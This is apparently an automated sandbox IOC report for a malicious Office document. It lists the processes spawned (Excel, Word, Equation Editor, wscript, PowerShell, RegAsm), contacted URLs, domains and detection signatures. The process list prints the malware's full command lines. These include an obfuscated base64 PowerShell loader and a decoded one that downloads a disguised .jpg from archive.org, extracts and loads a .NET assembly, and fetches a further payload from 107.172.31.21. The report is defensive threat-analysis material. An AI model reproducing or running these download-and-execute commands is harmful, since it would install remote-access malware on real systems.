Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding

C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBS? ? ? ? ?FI? ? ? ? ?VgBF? ? ? ? ?C8? ? ? ? ?YwBi? ? ? ? ?G4? ? ? ? ?LwBw? ? ? ? ?H? ? ? ? ?? ? ? ? ?bQBh? ? ? ? ?Hg? ? ? ? ?Lw? ? ? ? ?x? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?x? ? ? ? ?DM? ? ? ? ?Lg? ? ? ? ?y? ? ? ? ?Dc? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RRVE/cbn/ppmax/12.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dkvezxrxwrjunntcnioxumzdjxq"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\neiwzpcqkzbyxbpgesbzxztmrehzcv"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qgopainsfhtlahdsndosiegdstrivgqcq"

There are 1 hidden processes, click here to show them.

URLs

Name

Malicious

https://ia803104.us.archive.org

unknown

http://107.172.31.21/xampp/nbc/un/sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret.doc

107.172.31.21

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

207.241.232.154

2024remcmon.duckdns.org

http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF

107.172.31.21

http://107.172.31.21/xampp/nbc/EVRR.txt

107.172.31.21

http://b.scorecardresearch.com/beacon.js

unknown

http://acdn.adnxs.com/ast/ast.js

unknown

http://www.imvu.comr

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_

unknown

http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC:

unknown

http://ocsp.entrust.net03

unknown

https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1

unknown

https://contoso.com/License

unknown

https://zhort.de/FoNVg0

88.99.66.38

https://support.google.com/chrome/?p=plugin_flash

unknown

http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png

unknown

http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0

unknown

http://www.diginotar.nl/cps/pkioverheid0

unknown

https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9

unknown

http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html

unknown

http://www.nirsoft.net

unknown

https://deff.nelreports.net/api/report?cat=msn

unknown

https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js

unknown

http://www.imvu.com/LK

unknown

http://go.micros

unknown

http://107.172.31.21

unknown

http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com

unknown

http://cache.btrll.com/default/Pix-1x1.gif

unknown

http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683

unknown

https://www.google.com

unknown

http://geoplugin.net/json.gp/C

unknown

http://o.aolcdn.com/ads/adswrappermsni.js

unknown

http://cdn.taboola.com/libtrc/msn-home-network/loader.js

unknown

http://www.msn.com/?ocid=iehp

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

unknown

http://static.chartbeat.com/js/chartbeat.js

unknown

http://www.msn.com/de-de/?ocid=iehp

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%

unknown

https://login.yahoo.com/config/login

unknown

http://www.nirsoft.net/

unknown

http://ocsp.entrust.net0D

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://ia803104.us.archive.org/27/items/vbs_20240LR

unknown

https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3

unknown

http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683

unknown

https://zhort.de/FoNVg0yX

unknown

http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(

unknown

https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh

unknown

http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js

unknown

http://nuget.org/NuGet.exe

unknown

https://www.ccleaner.com/go/app_cc_pro_trialkey

unknown

http://crl.entrust.net/server1.crl0

unknown

https://contextual.media.net/8/nrrV73987.js

unknown

http://www.imvu.com

unknown

https://contoso.com/Icon

unknown

http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU

unknown

https://contextual.media.net/

unknown

http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js

unknown

https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2

unknown

http://www.msn.com/

unknown

https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au

unknown

http://geoplugin.net/json.gp

178.237.33.50

http://crl.pkioverheid.nl/DomOvLatestCRL.crl0

unknown

https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549

unknown

http://cdn.at.atwola.com/_media/uac/msn.html

unknown

https://www.google.com/accounts/servicelogin

unknown

http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset

unknown

https://secure.comodo.com/CPS0

unknown

https://policies.yahoo.com/w3c/p3p.xml

unknown

https://zhort.de/

unknown

http://crl.entrust.net/2048ca.crl0

unknown

http://www.msn.com/advertisement.ad.js

unknown

http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj

unknown

http://www.ebuddy.com

unknown

There are 68 hidden URLs, click here to show them.

Domains

Name

Malicious

zhort.de

88.99.66.38

Details

Name:	zhort.de
IP:	88.99.66.38
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Microsoft Office launches external ms-search protocol handler (WebDAV)	Persistence and Installation Behavior
Microsoft Office drops suspicious files	System Summary
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Excel Network Connections	System Summary
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

ia803104.us.archive.org

207.241.232.154

Details

Name:	ia803104.us.archive.org
IP:	207.241.232.154
TargetID:	13
Current Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and load assembly	Data Obfuscation
Suricata IDS alerts for network traffic	Networking
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

2024remcmon.duckdns.org

192.210.214.9

Details

